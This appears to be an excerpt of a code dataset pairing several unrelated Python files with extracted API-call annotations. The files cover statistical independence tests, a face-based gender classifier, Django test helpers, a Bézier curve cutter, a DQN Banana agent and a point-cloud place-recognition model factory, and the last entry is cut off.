[((1494, 1543), 'sol.handle_simple.handle_unknown_detect_transfers', 'handle_unknown_detect_transfers', (['exporter', 'txinfo'], {}), '(exporter, txinfo)\n', (1525, 1543), False, 'from sol.handle_simple import handle_unknown_detect_transfers\n'), ((403, 491), 'common.make_tx.make_swap_tx', 'make_swap_tx', (['txinfo', 'sent_amount', 'sent_currency', 'received_amount', 'received_currency'], {}), '(txinfo, sent_amount, sent_currency, received_amount,\n received_currency)\n', (415, 491), False, 'from common.make_tx import make_swap_tx\n'), ((539, 588), 'sol.handle_simple.handle_unknown_detect_transfers', 'handle_unknown_detect_transfers', (['exporter', 'txinfo'], {}), '(exporter, txinfo)\n', (570, 588), False, 'from sol.handle_simple import handle_unknown_detect_transfers\n'), ((1356, 1444), 'common.make_tx.make_swap_tx', 'make_swap_tx', (['txinfo', 'sent_amount', 'sent_currency', 'received_amount', 'received_currency'], {}), '(txinfo, sent_amount, sent_currency, received_amount,\n received_currency)\n', (1368, 1444), False, 'from common.make_tx import make_swap_tx\n')]
""" Functions for testing independence of several distributions. The functions in this module provide methods for testing if the samples generated from two random vectors are independent. """ import numpy as np import scipy.stats from . import _dcor_internals, _hypothesis from ._dcor import u_distance_correlation_sqr from ._utils import _random_state_init, _transform_to_2d def distance_covariance_test( x, y, *, num_resamples=0, exponent=1, random_state=None, n_jobs=1, ): """ Test of distance covariance independence. Compute the test of independence based on the distance covariance, for two random vectors. The test is a permutation test where the null hypothesis is that the two random vectors are independent. Parameters ---------- x: array_like First random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. y: array_like Second random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. exponent: float Exponent of the Euclidean distance, in the range :math:`(0, 2)`. Equivalently, it is twice the Hurst parameter of fractional Brownian motion. num_resamples: int Number of permutations resamples to take in the permutation test. random_state: {None, int, array_like, numpy.random.RandomState} Random state to generate the permutations. Returns ------- HypothesisTest Results of the hypothesis test. See Also -------- distance_covariance Examples -------- >>> import numpy as np >>> import dcor >>> a = np.array([[1, 2, 3, 4], ... [5, 6, 7, 8], ... [9, 10, 11, 12], ... [13, 14, 15, 16]]) >>> b = np.array([[1, 0, 0, 1], ... [0, 1, 1, 1], ... [1, 1, 1, 1], ... [1, 1, 0, 1]]) >>> dcor.independence.distance_covariance_test(a, a) HypothesisTest(p_value=1.0, statistic=208.0) >>> dcor.independence.distance_covariance_test(a, b) ... # doctest: +ELLIPSIS HypothesisTest(p_value=1.0, statistic=11.75323056...) >>> dcor.independence.distance_covariance_test(b, b) HypothesisTest(p_value=1.0, statistic=1.3604610...) >>> dcor.independence.distance_covariance_test(a, b, ... num_resamples=5, random_state=0) HypothesisTest(p_value=0.5, statistic=11.7532305...) >>> dcor.independence.distance_covariance_test(a, b, ... num_resamples=5, random_state=13) HypothesisTest(p_value=0.3333333..., statistic=11.7532305...) >>> dcor.independence.distance_covariance_test(a, a, ... num_resamples=7, random_state=0) HypothesisTest(p_value=0.125, statistic=208.0) """ x = _transform_to_2d(x) y = _transform_to_2d(y) _dcor_internals._check_same_n_elements(x, y) random_state = _random_state_init(random_state) # Compute U-centered matrices u_x = _dcor_internals._distance_matrix_generic( x, centering=_dcor_internals.double_centered, exponent=exponent) u_y = _dcor_internals._distance_matrix_generic( y, centering=_dcor_internals.double_centered, exponent=exponent) # Use the dcov statistic def statistic_function(distance_matrix): return u_x.shape[0] * _dcor_internals.mean_product( distance_matrix, u_y) return _hypothesis._permutation_test_with_sym_matrix( u_x, statistic_function=statistic_function, num_resamples=num_resamples, random_state=random_state, n_jobs=n_jobs) def partial_distance_covariance_test( x, y, z, *, num_resamples=0, exponent=1, random_state=None, n_jobs=1, ): """ Test of partial distance covariance independence. Compute the test of independence based on the partial distance covariance, for two random vectors conditioned on a third. The test is a permutation test where the null hypothesis is that the first two random vectors are independent given the third one. Parameters ---------- x: array_like First random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. y: array_like Second random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. z: array_like Observed random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. num_resamples: int Number of permutations resamples to take in the permutation test. random_state: {None, int, array_like, numpy.random.RandomState} Random state to generate the permutations. Returns ------- HypothesisTest Results of the hypothesis test. See Also -------- partial_distance_covariance Examples -------- >>> import numpy as np >>> import dcor >>> a = np.array([[1, 2, 3, 4], ... [5, 6, 7, 8], ... [9, 10, 11, 12], ... [13, 14, 15, 16]]) >>> b = np.array([[1, 0, 0, 1], ... [0, 1, 1, 1], ... [1, 1, 1, 1], ... [1, 1, 0, 1]]) >>> c = np.array([[1000, 0, 0, 1000], ... [0, 1000, 1000, 1000], ... [1000, 1000, 1000, 1000], ... [1000, 1000, 0, 1000]]) >>> dcor.independence.partial_distance_covariance_test(a, a, b) ... # doctest: +ELLIPSIS HypothesisTest(p_value=1.0, statistic=142.6664416...) >>> dcor.independence.partial_distance_covariance_test(a, b, c) ... # doctest: +ELLIPSIS HypothesisTest(p_value=1.0, statistic=7.2690070...e-15) >>> dcor.independence.partial_distance_covariance_test(b, b, c) ... # doctest: +ELLIPSIS HypothesisTest(p_value=1.0, statistic=2.2533380...e-30) >>> dcor.independence.partial_distance_covariance_test(a, b, c, ... num_resamples=5, random_state=0) HypothesisTest(p_value=0.1666666..., statistic=7.2690070...e-15) >>> dcor.independence.partial_distance_covariance_test(a, b, c, ... num_resamples=5, random_state=13) HypothesisTest(p_value=0.1666666..., statistic=7.2690070...e-15) >>> dcor.independence.partial_distance_covariance_test(a, c, b, ... num_resamples=7, random_state=0) HypothesisTest(p_value=1.0, statistic=-7.5701764...e-12) """ random_state = _random_state_init(random_state) # Compute U-centered matrices u_x = _dcor_internals._u_distance_matrix(x, exponent=exponent) u_y = _dcor_internals._u_distance_matrix(y, exponent=exponent) u_z = _dcor_internals._u_distance_matrix(z, exponent=exponent) # Compute projections proj = _dcor_internals.u_complementary_projection(u_z) p_xz = proj(u_x) p_yz = proj(u_y) # Use the pdcor statistic def statistic_function(distance_matrix): return u_x.shape[0] * _dcor_internals.u_product( distance_matrix, p_yz) return _hypothesis._permutation_test_with_sym_matrix( p_xz, statistic_function=statistic_function, num_resamples=num_resamples, random_state=random_state, n_jobs=n_jobs) def distance_correlation_t_statistic(x, y): """ Transformation of the bias corrected version of distance correlation used in :func:`distance_correlation_t_test`. Parameters ---------- x: array_like First random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. y: array_like Second random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. Returns ------- numpy scalar T statistic. See Also -------- distance_correlation_t_test Examples -------- >>> import numpy as np >>> import dcor >>> a = np.array([[1, 2, 3, 4], ... [5, 6, 7, 8], ... [9, 10, 11, 12], ... [13, 14, 15, 16]]) >>> b = np.array([[1, 0, 0, 1], ... [0, 1, 1, 1], ... [1, 1, 1, 1], ... [1, 1, 0, 1]]) >>> with np.errstate(divide='ignore'): ... dcor.independence.distance_correlation_t_statistic(a, a) inf >>> dcor.independence.distance_correlation_t_statistic(a, b) ... # doctest: +ELLIPSIS -0.4430164... >>> with np.errstate(divide='ignore'): ... dcor.independence.distance_correlation_t_statistic(b, b) inf """ bcdcor = u_distance_correlation_sqr(x, y) n = x.shape[0] v = n * (n - 3) / 2 return np.sqrt(v - 1) * bcdcor / np.sqrt(1 - bcdcor**2) def distance_correlation_t_test(x, y): """ Test of independence for high dimension based on convergence to a Student t distribution. The null hypothesis is that the two random vectors are independent. Parameters ---------- x: array_like First random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. y: array_like Second random vector. The columns correspond with the individual random variables while the rows are individual instances of the random vector. Returns ------- HypothesisTest Results of the hypothesis test. See Also -------- distance_correlation_t_statistic Examples -------- >>> import numpy as np >>> import dcor >>> a = np.array([[1, 2, 3, 4], ... [5, 6, 7, 8], ... [9, 10, 11, 12], ... [13, 14, 15, 16]]) >>> b = np.array([[1, 0, 0, 1], ... [0, 1, 1, 1], ... [1, 1, 1, 1], ... [1, 1, 0, 1]]) >>> with np.errstate(divide='ignore'): ... dcor.independence.distance_correlation_t_test(a, a) ... # doctest: +ELLIPSIS HypothesisTest(p_value=0.0, statistic=inf) >>> dcor.independence.distance_correlation_t_test(a, b) ... # doctest: +ELLIPSIS HypothesisTest(p_value=0.6327451..., statistic=-0.4430164...) >>> with np.errstate(divide='ignore'): ... dcor.independence.distance_correlation_t_test(b, b) ... # doctest: +ELLIPSIS HypothesisTest(p_value=0.0, statistic=inf) """ t_test = distance_correlation_t_statistic(x, y) n = x.shape[0] v = n * (n - 3) / 2 df = v - 1 p_value = 1 - scipy.stats.t.cdf(t_test, df=df) return _hypothesis.HypothesisTest(p_value=p_value, statistic=t_test)
[ "numpy.sqrt" ]
[((9268, 9292), 'numpy.sqrt', 'np.sqrt', (['(1 - bcdcor ** 2)'], {}), '(1 - bcdcor ** 2)\n', (9275, 9292), True, 'import numpy as np\n'), ((9242, 9256), 'numpy.sqrt', 'np.sqrt', (['(v - 1)'], {}), '(v - 1)\n', (9249, 9256), True, 'import numpy as np\n')]
#coding=utf-8 #性别识别 import cv2 from keras.models import load_model import numpy as np import chineseText img = cv2.imread("img/gather.png") face_classifier = cv2.CascadeClassifier( "d:\Python36\Lib\site-packages\opencv-master\data\haarcascades\haarcascade_frontalface_default.xml" ) gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) faces = face_classifier.detectMultiScale( gray, scaleFactor=1.2, minNeighbors=3, minSize=(140, 140)) gender_classifier = load_model( "classifier/gender_models/simple_CNN.81-0.96.hdf5") gender_labels = {0: '女', 1: '男'} color = (255, 255, 255) for (x, y, w, h) in faces: face = img[(y - 60):(y + h + 60), (x - 30):(x + w + 30)] face = cv2.resize(face, (48, 48)) face = np.expand_dims(face, 0) face = face / 255.0 gender_label_arg = np.argmax(gender_classifier.predict(face)) gender = gender_labels[gender_label_arg] cv2.rectangle(img, (x, y), (x + h, y + w), color, 2) img = chineseText.cv2ImgAddText(img, gender, x + h, y, color, 30) cv2.imshow("Image", img) cv2.waitKey(0) cv2.destroyAllWindows()
[ "cv2.rectangle", "keras.models.load_model", "cv2.imshow", "cv2.waitKey", "cv2.destroyAllWindows", "cv2.cvtColor", "numpy.expand_dims", "cv2.CascadeClassifier", "cv2.resize", "cv2.imread", "chineseText.cv2ImgAddText" ]
[((113, 141), 'cv2.imread', 'cv2.imread', (['"""img/gather.png"""'], {}), "('img/gather.png')\n", (123, 141), False, 'import cv2\n'), ((160, 299), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""d:\\\\Python36\\\\Lib\\\\site-packages\\\\opencv-master\\\\data\\\\haarcascades\\\\haarcascade_frontalface_default.xml"""'], {}), "(\n 'd:\\\\Python36\\\\Lib\\\\site-packages\\\\opencv-master\\\\data\\\\haarcascades\\\\haarcascade_frontalface_default.xml'\n )\n", (181, 299), False, 'import cv2\n'), ((296, 333), 'cv2.cvtColor', 'cv2.cvtColor', (['img', 'cv2.COLOR_BGR2GRAY'], {}), '(img, cv2.COLOR_BGR2GRAY)\n', (308, 333), False, 'import cv2\n'), ((460, 522), 'keras.models.load_model', 'load_model', (['"""classifier/gender_models/simple_CNN.81-0.96.hdf5"""'], {}), "('classifier/gender_models/simple_CNN.81-0.96.hdf5')\n", (470, 522), False, 'from keras.models import load_model\n'), ((1010, 1034), 'cv2.imshow', 'cv2.imshow', (['"""Image"""', 'img'], {}), "('Image', img)\n", (1020, 1034), False, 'import cv2\n'), ((1035, 1049), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1046, 1049), False, 'import cv2\n'), ((1050, 1073), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1071, 1073), False, 'import cv2\n'), ((685, 711), 'cv2.resize', 'cv2.resize', (['face', '(48, 48)'], {}), '(face, (48, 48))\n', (695, 711), False, 'import cv2\n'), ((723, 746), 'numpy.expand_dims', 'np.expand_dims', (['face', '(0)'], {}), '(face, 0)\n', (737, 746), True, 'import numpy as np\n'), ((886, 938), 'cv2.rectangle', 'cv2.rectangle', (['img', '(x, y)', '(x + h, y + w)', 'color', '(2)'], {}), '(img, (x, y), (x + h, y + w), color, 2)\n', (899, 938), False, 'import cv2\n'), ((949, 1008), 'chineseText.cv2ImgAddText', 'chineseText.cv2ImgAddText', (['img', 'gender', '(x + h)', 'y', 'color', '(30)'], {}), '(img, gender, x + h, y, color, 30)\n', (974, 1008), False, 'import chineseText\n')]
from django.test import TestCase from os import path from rest_framework import status from rest_framework.test import APIClient import random from scheduler.models import Profile from scheduler.factories import ( CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for, ) random.seed(0) COURSE_NAMES = ("CS88", "CS61A", "CS61B", "CS70", "CS61C", "EE16A") ROLE_MAP = Profile.ROLE_MAP BASE_PATH = "/scheduler" # ----- REQUEST UTILITIES ----- def fail_msg(ep, resp): return "Endpoint: {}\nResponse Content: {}".format(ep, resp.content) class APITestCase(TestCase): def get_client_for(self, user): """Returns an APIClient object that is logged in as the provided user.""" client = APIClient() client.force_authenticate(user) return client def request(self, method, endpoint, exp_code=None, data=None): """ Performs a request to the specified endpoint and returns the response object. Also checks if the status code of the response is exp_code, if provided. The method parameter should be a get/post/etc from an APIClient object. """ resp = method(path.join(BASE_PATH, endpoint.strip("/")), follow=True, data=data) if exp_code is not None: self.assertEqual(resp.status_code, exp_code, msg=fail_msg(endpoint, resp)) return resp def req_fails_perms(self, method, endpoint, data=None): """ Performs a request to the specified endpoint, and checks that it fails due to the user lacking proper permissions. The method parameter should be a get/post/etc from an APIClient object. Returns the response object afterwards. """ return self.request( method, endpoint, exp_code=status.HTTP_403_FORBIDDEN, data=data ) def req_fails_method(self, method, endpoint, data=None): """ Performs a request to the specified endpoint, and checks that it fails due to the endpoint not supporting the provided method. Returns the response object. """ return self.request( method, endpoint, exp_code=status.HTTP_405_METHOD_NOT_ALLOWED, data=data ) def req_succeeds(self, method, endpoint, data=None): """ Performs a request to the specified endpoint, and checks that it succeeds. The method parameter should be a get/post/etc from an APIClient object. Returns the response object. """ return self.request(method, endpoint, exp_code=status.HTTP_200_OK, data=data) # ----- MODEL GENERATION ----- def random_objs(clazz, n=1): """ Generates N instances of the provided class, retrieved from the database. """ src = clazz.objects.all() for _ in range(n): yield random.choice(src) def make_test_courses(): """Creates course objects and persists them to database.""" return [CourseFactory.create(name=name) for name in COURSE_NAMES] def make_test_users(n): """Creates N test users and persists them to database.""" return UserFactory.create_batch(n) def give_role(user, role, course): """ Creates a profile for USER in a given ROLE for the provided COURSE, and saves the profile to database. """ return ProfileFactory.create( user=user, course=course, leader=None, section=None, role=role ) def create_empty_section_for(mentor): """ Creates a section for MENTOR without populated students. """ return SectionFactory.create(course=mentor.course, mentor=mentor) def enroll_user_as_student(user, section): """ Creates a student profile for USER, and assigns them to the given SECTION. Also creates blank attendances as necessary. Returns the created profile. """ student = give_role(user, Profile.STUDENT, section.course) student.section = section student.leader = section.leader create_attendances_for(student) return student def gen_test_data(cls, NUM_USERS=300): """ Adds NUM_USERS users to the database and initializes profiles for them as follows: - 2 coords per course - 4 SMs per coord, each with a section of 3-6 students - 3 JMs per SM, each with a section of 3-6 students """ users = iter(make_test_users(NUM_USERS)) courses = make_test_courses() # for sanity tests, everyone only has one role for now num_courses = len(courses) coords, seniors, juniors, students = [], [], [], [] COORD_COUNT = 2 SM_COUNT = 4 JM_COUNT = 3 def assign(role, leader, c, lst): # returns the profile created profile = give_role(next(users), role, c) profile.leader = leader lst.append(profile) return profile try: for c in courses: # coords for i in range(COORD_COUNT): coord = assign(Profile.COORDINATOR, None, c, coords) # SMs for j in range(SM_COUNT): sm = assign(Profile.SENIOR_MENTOR, coord, c, seniors) section = create_empty_section_for(sm) for k in range(random.randint(3, 6)): students.append(enroll_user_as_student(next(users), section)) # JMs for k in range(JM_COUNT): jm = assign(Profile.JUNIOR_MENTOR, sm, c, juniors) for _ in range(random.randint(3, 6)): students.append( enroll_user_as_student(next(users), section) ) except StopIteration: pass cls.users = users cls.courses = courses cls.coords = coords cls.seniors = seniors cls.juniors = juniors cls.students = students
[ "random.choice", "scheduler.factories.create_attendances_for", "scheduler.factories.UserFactory.create_batch", "random.seed", "rest_framework.test.APIClient", "scheduler.factories.SectionFactory.create", "scheduler.factories.ProfileFactory.create", "scheduler.factories.CourseFactory.create", "random.randint" ]
[((388, 402), 'random.seed', 'random.seed', (['(0)'], {}), '(0)\n', (399, 402), False, 'import random\n'), ((3184, 3211), 'scheduler.factories.UserFactory.create_batch', 'UserFactory.create_batch', (['n'], {}), '(n)\n', (3208, 3211), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((3378, 3467), 'scheduler.factories.ProfileFactory.create', 'ProfileFactory.create', ([], {'user': 'user', 'course': 'course', 'leader': 'None', 'section': 'None', 'role': 'role'}), '(user=user, course=course, leader=None, section=None,\n role=role)\n', (3399, 3467), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((3600, 3658), 'scheduler.factories.SectionFactory.create', 'SectionFactory.create', ([], {'course': 'mentor.course', 'mentor': 'mentor'}), '(course=mentor.course, mentor=mentor)\n', (3621, 3658), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((4002, 4033), 'scheduler.factories.create_attendances_for', 'create_attendances_for', (['student'], {}), '(student)\n', (4024, 4033), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((821, 832), 'rest_framework.test.APIClient', 'APIClient', ([], {}), '()\n', (830, 832), False, 'from rest_framework.test import APIClient\n'), ((3027, 3058), 'scheduler.factories.CourseFactory.create', 'CourseFactory.create', ([], {'name': 'name'}), '(name=name)\n', (3047, 3058), False, 'from scheduler.factories import CourseFactory, SpacetimeFactory, UserFactory, ProfileFactory, SectionFactory, AttendanceFactory, OverrideFactory, create_attendances_for\n'), ((2905, 2923), 'random.choice', 'random.choice', (['src'], {}), '(src)\n', (2918, 2923), False, 'import random\n'), ((5211, 5231), 'random.randint', 'random.randint', (['(3)', '(6)'], {}), '(3, 6)\n', (5225, 5231), False, 'import random\n'), ((5506, 5526), 'random.randint', 'random.randint', (['(3)', '(6)'], {}), '(3, 6)\n', (5520, 5526), False, 'import random\n')]
import math from fontTools.pens.recordingPen import RecordingPen, replayRecording from fontTools.misc.bezierTools import calcCubicArcLength, splitCubicAtT from coldtype.geometry import Rect, Point def raise_quadratic(start, a, b): c0 = start c1 = (c0[0] + (2/3)*(a[0] - c0[0]), c0[1] + (2/3)*(a[1] - c0[1])) c2 = (b[0] + (2/3)*(a[0] - b[0]), b[1] + (2/3)*(a[1] - b[1])) c3 = (b[0], b[1]) return [c1, c2, c3] __length_cache = {} __split_cache = {} def splitCubicAtT_cached(a, b, c, d, t): global __split_cache abcdt = (a, b, c, d, t) sc = __split_cache.get(abcdt) if sc: return sc else: s = splitCubicAtT(a, b, c, d, t) __split_cache[abcdt] = s return s def calcCubicArcLength_cached(a, b, c, d): #return calcCubicArcLength(a, b, c, d) global __length_cache abcd = (a, b, c, d) lc = __length_cache.get(abcd) if lc: return lc else: l = calcCubicArcLength(a, b, c, d) __length_cache[abcd] = l return l class CurveCutter(): def __init__(self, g, inc=0.0015): if isinstance(g, RecordingPen): self.pen = g else: self.pen = RecordingPen() g.draw(self.pen) self.inc = inc self.length = self.calcCurveLength() def calcCurveLength(self): length = 0 for i, (t, pts) in enumerate(self.pen.value): if t == "curveTo": p1, p2, p3 = pts p0 = self.pen.value[i-1][-1][-1] length += calcCubicArcLength_cached(p0, p1, p2, p3) elif t == "lineTo": pass # todo return length def subsegment(self, start=None, end=None): global __cut_cache inc = self.inc length = self.length ended = False _length = 0 out = [] for i, (t, pts) in enumerate(self.pen.value): if t == "curveTo": p1, p2, p3 = pts p0 = self.pen.value[i-1][-1][-1] length_arc = calcCubicArcLength_cached(p0, p1, p2, p3) if _length + length_arc < end: _length += length_arc else: t = inc tries = 0 while not ended: a, b = splitCubicAtT_cached(p0, p1, p2, p3, t) length_a = calcCubicArcLength_cached(*a) if _length + length_a > end: ended = True out.append(("curveTo", a[1:])) else: t += inc tries += 1 if t == "lineTo": pass # TODO if not ended: out.append((t, pts)) if out[-1][0] != "endPath": out.append(("endPath",[])) return out def subsegmentPoint(self, start=0, end=1): inc = self.inc subsegment = self.subsegment(start=start, end=end) try: t, (a, b, c) = subsegment[-2] tangent = math.degrees(math.atan2(c[1] - b[1], c[0] - b[0]) + math.pi*.5) return c, tangent except ValueError: return None, None
[ "fontTools.misc.bezierTools.splitCubicAtT", "fontTools.pens.recordingPen.RecordingPen", "math.atan2", "fontTools.misc.bezierTools.calcCubicArcLength" ]
[((650, 678), 'fontTools.misc.bezierTools.splitCubicAtT', 'splitCubicAtT', (['a', 'b', 'c', 'd', 't'], {}), '(a, b, c, d, t)\n', (663, 678), False, 'from fontTools.misc.bezierTools import calcCubicArcLength, splitCubicAtT\n'), ((951, 981), 'fontTools.misc.bezierTools.calcCubicArcLength', 'calcCubicArcLength', (['a', 'b', 'c', 'd'], {}), '(a, b, c, d)\n', (969, 981), False, 'from fontTools.misc.bezierTools import calcCubicArcLength, splitCubicAtT\n'), ((1195, 1209), 'fontTools.pens.recordingPen.RecordingPen', 'RecordingPen', ([], {}), '()\n', (1207, 1209), False, 'from fontTools.pens.recordingPen import RecordingPen, replayRecording\n'), ((3145, 3181), 'math.atan2', 'math.atan2', (['(c[1] - b[1])', '(c[0] - b[0])'], {}), '(c[1] - b[1], c[0] - b[0])\n', (3155, 3181), False, 'import math\n')]
""" Project for Udacity Danaodgree in Deep Reinforcement Learning This script train an agent to navigate (and collect bananas!) in a large, square world. A reward of +1 is provided for collecting a yellow banana, and a reward of -1 is provided for collecting a blue banana. Thus, the goal of your agent is to collect as many yellow bananas as possible while avoiding blue bananas. The state space has 37 dimensions and contains the agent's velocity, along with ray-based perception of objects around the agent's forward direction. Given this information, the agent has to learn how to best select actions. Four discrete actions are available, corresponding to: 0 - move forward. 1 - move backward. 2 - turn left. 3 - turn right. The task is episodic, and in order to solve the environment, your agent must get an average score of +13 over 100 consecutive episodes. """ from unityagents import UnityEnvironment import numpy as np from collections import deque from dqn_agent import Agent import torch device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") """ Unity environment configuration Mac: "path/to/Banana.app" Windows (x86): "path/to/Banana_Windows_x86/Banana.exe" Windows (x86_64): "path/to/Banana_Windows_x86_64/Banana.exe" Linux (x86): "path/to/Banana_Linux/Banana.x86" Linux (x86_64): "path/to/Banana_Linux/Banana.x86_64" Linux (x86, headless): "path/to/Banana_Linux_NoVis/Banana.x86" Linux (x86_64, headless): "path/to/Banana_Linux_NoVis/Banana.x86_64" """ # start Unity environment env = UnityEnvironment(file_name="Banana.app") # get the default brain brain_name = env.brain_names[0] brain = env.brains[brain_name] env_info = env.reset(train_mode=False)[brain_name] action_size = brain.vector_action_space_size state_size = len(env_info.vector_observations[0]) # initialize agent agent = Agent(state_size=state_size, action_size=action_size, seed=0, device=device) def train(n_episodes=2000, eps_start=1.0, eps_end=0.05, eps_decay=0.99): """Deep Q-Learning. Params ====== n_episodes (int): maximum number of training episodes eps_start (float): starting value of epsilon, for epsilon-greedy action selection eps_end (float): minimum value of epsilon eps_decay (float): multiplicative factor (per episode) for decreasing epsilon """ scores = [] # list containing scores from each episode scores_window = deque(maxlen=100) # last 100 scores eps = eps_start # initialize epsilon for i_episode in range(1, n_episodes+1): # reset environment env_info = env.reset(train_mode=True)[brain_name] # get initial state state = env_info.vector_observations[0] # set initial score score = 0 while True: action = agent.act(state, eps) env_info = env.step(action)[brain_name] next_state, reward, done = env_info.vector_observations[0], env_info.rewards[0], env_info.local_done[0] agent.step(state, action, reward, next_state, done) state = next_state score += reward if done: break scores_window.append(score) # save most recent score scores.append(score) # save most recent score eps = max(eps_end, eps_decay*eps) # decrease epsilon print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)), end="") if i_episode % 100 == 0: print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window))) if np.mean(scores_window)>=14: print('\nEnvironment solved in {:d} episodes!\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_window))) torch.save(agent.qnetwork_local.state_dict(), 'checkpoint.pth') break return scores train()
[ "numpy.mean", "collections.deque", "dqn_agent.Agent", "unityagents.UnityEnvironment", "torch.cuda.is_available" ]
[((1524, 1564), 'unityagents.UnityEnvironment', 'UnityEnvironment', ([], {'file_name': '"""Banana.app"""'}), "(file_name='Banana.app')\n", (1540, 1564), False, 'from unityagents import UnityEnvironment\n'), ((1829, 1905), 'dqn_agent.Agent', 'Agent', ([], {'state_size': 'state_size', 'action_size': 'action_size', 'seed': '(0)', 'device': 'device'}), '(state_size=state_size, action_size=action_size, seed=0, device=device)\n', (1834, 1905), False, 'from dqn_agent import Agent\n'), ((2429, 2446), 'collections.deque', 'deque', ([], {'maxlen': '(100)'}), '(maxlen=100)\n', (2434, 2446), False, 'from collections import deque\n'), ((1038, 1063), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1061, 1063), False, 'import torch\n'), ((3653, 3675), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3660, 3675), True, 'import numpy as np\n'), ((3477, 3499), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3484, 3499), True, 'import numpy as np\n'), ((3617, 3639), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3624, 3639), True, 'import numpy as np\n'), ((3785, 3807), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3792, 3807), True, 'import numpy as np\n')]
# Warsaw University of Technology from layers.eca_block import ECABasicBlock from models.minkgl import MinkHead, MinkTrunk, MinkGL from models.minkloc import MinkLoc from third_party.minkloc3d.minkloc import MinkLoc3D from misc.utils import ModelParams def model_factory(model_params: ModelParams): in_channels = 1 if model_params.model == 'MinkLoc': model = MinkLoc(in_channels=in_channels, feature_size=model_params.feature_size, output_dim=model_params.output_dim, planes=model_params.planes, layers=model_params.layers, num_top_down=model_params.num_top_down, conv0_kernel_size=model_params.conv0_kernel_size, block=model_params.block, pooling_method=model_params.pooling) elif model_params.model == 'MinkLoc3D': model = MinkLoc3D() elif 'egonn' in model_params.model: model = create_egonn_model(model_params) else: raise NotImplementedError('Model not implemented: {}'.format(model_params.model)) return model def create_egonn_model(model_params: ModelParams): model_name = model_params.model global_normalize = False local_normalize = True if model_name == 'egonn': # THIS IS OUR BEST MODEL block = ECABasicBlock planes = [32, 64, 64, 128, 128, 128, 128] layers = [1, 1, 1, 1, 1, 1, 1] global_in_levels = [5, 6, 7] global_map_channels = 128 global_descriptor_size = 256 local_in_levels = [3, 4] local_map_channels = 64 local_descriptor_size = 128 else: raise NotImplementedError(f'Unknown model: {model_name}') # Planes list number of channels for level 1 and above global_in_channels = [planes[i-1] for i in global_in_levels] head_global = MinkHead(global_in_levels, global_in_channels, global_map_channels) if len(local_in_levels) > 0: local_in_channels = [planes[i-1] for i in local_in_levels] head_local = MinkHead(local_in_levels, local_in_channels, local_map_channels) else: head_local = None min_out_level = len(planes) if len(global_in_levels) > 0: min_out_level = min(min_out_level, min(global_in_levels)) if len(local_in_levels) > 0: min_out_level = min(min_out_level, min(local_in_levels)) trunk = MinkTrunk(in_channels=1, planes=planes, layers=layers, conv0_kernel_size=5, block=block, min_out_level=min_out_level) net = MinkGL(trunk, local_head=head_local, local_descriptor_size=local_descriptor_size, local_normalize=local_normalize, global_head=head_global, global_descriptor_size=global_descriptor_size, global_pool_method='GeM', global_normalize=global_normalize, quantizer=model_params.quantizer) return net
[ "models.minkgl.MinkHead", "models.minkgl.MinkGL", "models.minkloc.MinkLoc", "models.minkgl.MinkTrunk", "third_party.minkloc3d.minkloc.MinkLoc3D" ]
[((1835, 1902), 'models.minkgl.MinkHead', 'MinkHead', (['global_in_levels', 'global_in_channels', 'global_map_channels'], {}), '(global_in_levels, global_in_channels, global_map_channels)\n', (1843, 1902), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((2370, 2491), 'models.minkgl.MinkTrunk', 'MinkTrunk', ([], {'in_channels': '(1)', 'planes': 'planes', 'layers': 'layers', 'conv0_kernel_size': '(5)', 'block': 'block', 'min_out_level': 'min_out_level'}), '(in_channels=1, planes=planes, layers=layers, conv0_kernel_size=5,\n block=block, min_out_level=min_out_level)\n', (2379, 2491), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((2521, 2821), 'models.minkgl.MinkGL', 'MinkGL', (['trunk'], {'local_head': 'head_local', 'local_descriptor_size': 'local_descriptor_size', 'local_normalize': 'local_normalize', 'global_head': 'head_global', 'global_descriptor_size': 'global_descriptor_size', 'global_pool_method': '"""GeM"""', 'global_normalize': 'global_normalize', 'quantizer': 'model_params.quantizer'}), "(trunk, local_head=head_local, local_descriptor_size=\n local_descriptor_size, local_normalize=local_normalize, global_head=\n head_global, global_descriptor_size=global_descriptor_size,\n global_pool_method='GeM', global_normalize=global_normalize, quantizer=\n model_params.quantizer)\n", (2527, 2821), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((381, 716), 'models.minkloc.MinkLoc', 'MinkLoc', ([], {'in_channels': 'in_channels', 'feature_size': 